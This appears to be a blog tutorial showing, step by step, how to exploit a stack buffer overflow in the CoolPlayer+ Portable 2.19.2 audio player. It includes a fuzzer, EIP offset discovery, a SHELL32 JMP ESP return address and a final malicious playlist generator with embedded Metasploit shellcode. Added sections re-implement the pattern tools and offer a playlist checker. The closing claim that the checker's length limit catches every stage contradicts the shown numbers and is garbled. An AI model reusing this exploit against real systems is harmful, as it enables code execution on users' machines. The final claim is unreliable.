Monday, 8 October 2012

Buffer Overflow CoolPlayer+ Portable 2.19.2

Posted at 12:54
Today I learned how to exploit a buffer overflow in CoolPlayer+ Portable 2.19.2, an audio player for Windows. First I need to prepare some tools for the exploitation:

  1. Windows XP SP 3 English
  2. OllyDbg
  3. Metasploit
  4. Geany text editor
First, I create a simple fuzzer that writes a playlist entry of a chosen length, and step the size up from 100 to 1000 bytes. With 100 bytes the application already crashes, but the stack space available for a payload is too small. With 1000 bytes the application crashes as well, and now there is enough stack space.


#!C:\Python27\python.exe

########################################
## Information Security Shinobi Camp  #
##    http://is2c-dojo.com            #
##    http://scx020c07c.blogspot.com  #
########################################

# How to use
# fuzzer.py playme.m3u "\x41" 1000

import codecs
import sys

filename  = sys.argv[1]          # playlist file to write, e.g. playme.m3u
# the shell passes "\x41" as the four literal characters \x41, so decode the
# escape sequence into the raw byte the author intends to repeat
my_args   = codecs.decode(sys.argv[2], 'unicode_escape').encode('latin-1')
long_args = int(sys.argv[3])     # how many times to repeat it (the file size)

sploit = my_args * long_args

# binary mode so the bytes reach the file unchanged, then close to flush it
fopen = open(filename, 'wb')
fopen.write(sploit)
fopen.close()

Run the fuzzer, open the playlist in CoolPlayer and look at EIP in OllyDbg: it has been overwritten.
After confirming the EIP overwrite, I need to know exactly which bytes of the buffer land in EIP.
Use Metasploit's pattern_create to generate a unique pattern,
./pattern_create.rb 1000


and edit the fuzzer so it writes that pattern:


#!C:\Python27\python.exe
########################################
## Information Security Shinobi Camp  #
##    http://is2c-dojo.com            #
##    http://scx020c07c.blogspot.com  #
########################################
filename = "playme.m3u"
# paste the 1000-byte output of pattern_create.rb here
junk = b".....pattern_create......"
sploit = junk
fopen = open(filename, 'wb')
fopen.write(sploit)
fopen.close()


Now re-run the fuzzer, restart OllyDbg, attach CoolPlayer and load playme.m3u again.
Look at EIP, copy its value and check it with Metasploit's pattern_offset:
./pattern_offset.rb 30684139
It returns 209, meaning the four bytes following 209 bytes of junk are the ones that land in EIP. Now go back to the fuzzer and edit it to look like this:
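To make the offset arithmetic visible, the following Python re-implements the cyclic pattern that pattern_create and pattern_offset work with. It is an added example, not the blog's code and not Metasploit's own implementation; it reproduces the same uppercase-lowercase-digit triple scheme (Aa0Aa1Aa2...) and shows why the EIP value 30684139 from the debugger maps to offset 209.

```python
import string
import struct


def pattern_create(length):
    """Build a cyclic pattern of `length` characters in the Metasploit style:
    triples of an uppercase letter, a lowercase letter and a digit
    (Aa0Aa1Aa2 ... Aa9Ab0 ... Zz9), so every 4-byte window is unique
    and can be mapped back to its position."""
    chunks = []
    total = 0
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                total += 3
                if total >= length:
                    return "".join(chunks)[:length]
    raise ValueError("pattern is limited to 20280 bytes")


def pattern_offset(eip_hex, length=1000):
    """Return the offset of the four pattern bytes that ended up in EIP,
    given EIP as the hex string shown by the debugger (e.g. '30684139').
    x86 is little-endian, so register value 0x30684139 corresponds to the
    file bytes 0x39 0x41 0x68 0x30, i.e. the text '9Ah0'.
    Returns -1 when the value does not come from the pattern."""
    needle = struct.pack("<I", int(eip_hex, 16)).decode("latin-1")
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    print(pattern_create(1000)[:30])
    # 'Ag9' is triple number 69, so it starts at 207 and its '9' sits at 209,
    # directly followed by 'Ah0': the window '9Ah0' begins at offset 209
    print("EIP 30684139 sits at offset", pattern_offset("30684139"))
```

The same lookup explains why a 4-byte marker such as DEADBEEF is placed after exactly 209 bytes of padding in the next version of the fuzzer.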



#!C:\Python27\python.exe
########################################
## Information Security Shinobi Camp  #
##    http://is2c-dojo.com            #
##    http://scx020c07c.blogspot.com  #
########################################
filename = "playme.m3u"
junk  = b"\x90" * 209                # padding up to the saved return address
junk += b"\xEF\xBE\xAD\xDE"          # marker: EIP should read DEADBEEF (little-endian)
junk += b"\x41" * (1000 - len(junk)) # fill the rest so the file stays 1000 bytes
sploit = junk
fopen = open(filename, 'wb')
fopen.write(sploit)
fopen.close()

Run the fuzzer, restart OllyDbg and CoolPlayer, then load playme.m3u again. Make sure that EIP was overwritten with DEADBEEF.
Next we need a module containing a JMP ESP instruction.
Click View->Executable Modules and double-click SHELL32.dll. To search for JMP ESP, right-click->Search for->Command and enter JMP ESP. Note the address of the JMP ESP.

Back in the CPU window, click the ESP value in the register pane on the right and choose Follow in Dump.
We can see that the space at ESP is large enough for the Execute Command payload, so I will use that one.
Generate the payload with Metasploit, excluding the bad characters 00, 0a and 0d.
Edit the fuzzer again:

#!C:\Python27\python.exe
junk  = b"\x90" * 209                # padding up to the saved return address
junk += b"\xD7\x30\x9D\x7C"          # JMP ESP in SHELL32.dll (0x7C9D30D7, little-endian)
junk += b"\x90" * 16                 # small NOP sled in front of the payload
# Execute Command payload generated with Metasploit, bad chars 00 0a 0d excluded
junk += (b"\xba\x90\x6e\xa9\x03\xdb\xc1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
         b"\x32\x83\xc3\x04\x31\x53\x0e\x03\xc3\x60\x4b\xf6\x1f\x94\x02"
         b"\xf9\xdf\x65\x75\x73\x3a\x54\xa7\xe7\x4f\xc5\x77\x63\x1d\xe6"
         b"\xfc\x21\xb5\x7d\x70\xee\xba\x36\x3f\xc8\xf5\xc7\xf1\xd4\x59"
         b"\x0b\x93\xa8\xa3\x58\x73\x90\x6c\xad\x72\xd5\x90\x5e\x26\x8e"
         b"\xdf\xcd\xd7\xbb\x9d\xcd\xd6\x6b\xaa\x6e\xa1\x0e\x6c\x1a\x1b"
         b"\x10\xbc\xb3\x10\x5a\x24\xbf\x7f\x7b\x55\x6c\x9c\x47\x1c\x19"
         b"\x57\x33\x9f\xcb\xa9\xbc\xae\x33\x65\x83\x1f\xbe\x77\xc3\xa7"
         b"\x21\x02\x3f\xd4\xdc\x15\x84\xa7\x3a\x93\x19\x0f\xc8\x03\xfa"
         b"\xae\x1d\xd5\x89\xbc\xea\x91\xd6\xa0\xed\x76\x6d\xdc\x66\x79"
         b"\xa2\x55\x3c\x5e\x66\x3e\xe6\xff\x3f\x9a\x49\xff\x20\x42\x35"
         b"\xa5\x2b\x60\x22\xdf\x71\xee\xb5\x6d\x0c\x57\xb5\x6d\x0f\xf7"
         b"\xde\x5c\x84\x98\x99\x60\x4f\xdd\x56\x2b\xd2\x77\xff\xf2\x86"
         b"\xca\x62\x05\x7d\x08\x9b\x86\x74\xf0\x58\x96\xfc\xf5\x25\x10"
         b"\xec\x87\x36\xf5\x12\x34\x36\xdc\x70\xdb\xa4\xbc\x76")

sploit = junk

fopen = open("playme.m3u", 'wb')
fopen.write(sploit)
fopen.close()


Rerun the fuzzer, open CoolPlayer and load playme.m3u again. CoolPlayer crashes and the calculator appears.
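From the defensive side, a playlist like the one built above is easy to recognise before it reaches a vulnerable player: a real M3U entry is a short, printable path or URL, whereas the crafted file is a single 1000-byte line of 0x90 padding, a 4-byte address and encoded shellcode. The following Python 3 checker is an added example (not code from the blog) that scans a playlist for oversized entries, non-printable bytes and runs of NOP padding; the benign and crafted sample playlists inside it are constructed for the example, the crafted one mirroring the DEADBEEF stage of the fuzzer.

```python
import string

MAX_ENTRY_LEN = 260   # MAX_PATH on Windows; a legitimate entry is a path or URL
# bytes we accept in an entry: printable ASCII plus tab/CR/LF, not \v and \f
PRINTABLE = set(string.printable.encode("ascii")) - {0x0b, 0x0c}


def check_m3u(data):
    """Scan raw playlist bytes and return a list of (line_no, reason) findings.
    An empty list means nothing suspicious was seen. Lines that are empty or
    start with '#' (#EXTM3U / #EXTINF directives) are skipped."""
    findings = []
    for no, line in enumerate(data.split(b"\n"), 1):
        line = line.rstrip(b"\r")
        if not line or line.startswith(b"#"):
            continue
        if len(line) > MAX_ENTRY_LEN:
            findings.append((no, "entry is %d bytes, longer than MAX_PATH" % len(line)))
        bad = sorted({b for b in line if b not in PRINTABLE})
        if bad:
            findings.append((no, "non-printable bytes: "
                             + " ".join("%02x" % b for b in bad[:8])))
        if b"\x90" * 8 in line:
            findings.append((no, "run of 0x90 (NOP) padding"))
    return findings


# constructed sample: an ordinary playlist with a directive, a path and a URL
BENIGN = (b"#EXTM3U\r\n"
          b"#EXTINF:123,Sample Artist - Sample Title\r\n"
          b"C:\\Music\\sample.mp3\r\n"
          b"http://example.invalid/stream.mp3\r\n")

# constructed sample: 209 bytes of padding, the DEADBEEF marker, 1000 bytes total
CRAFTED = b"\x90" * 209 + b"\xEF\xBE\xAD\xDE"
CRAFTED += b"\x41" * (1000 - len(CRAFTED))


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("crafted", CRAFTED)):
        result = check_m3u(sample)
        print(name, "->", "clean" if not result else "")
        for line_no, reason in result:
            print("  line %d: %s" % (line_no, reason))
```

The length limit is the cheapest of the three checks and alone would have caught every stage of this write-up, since even the first 100-byte fuzz case is far shorter than the path a player can actually open only once it exceeds the buffer the author found.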

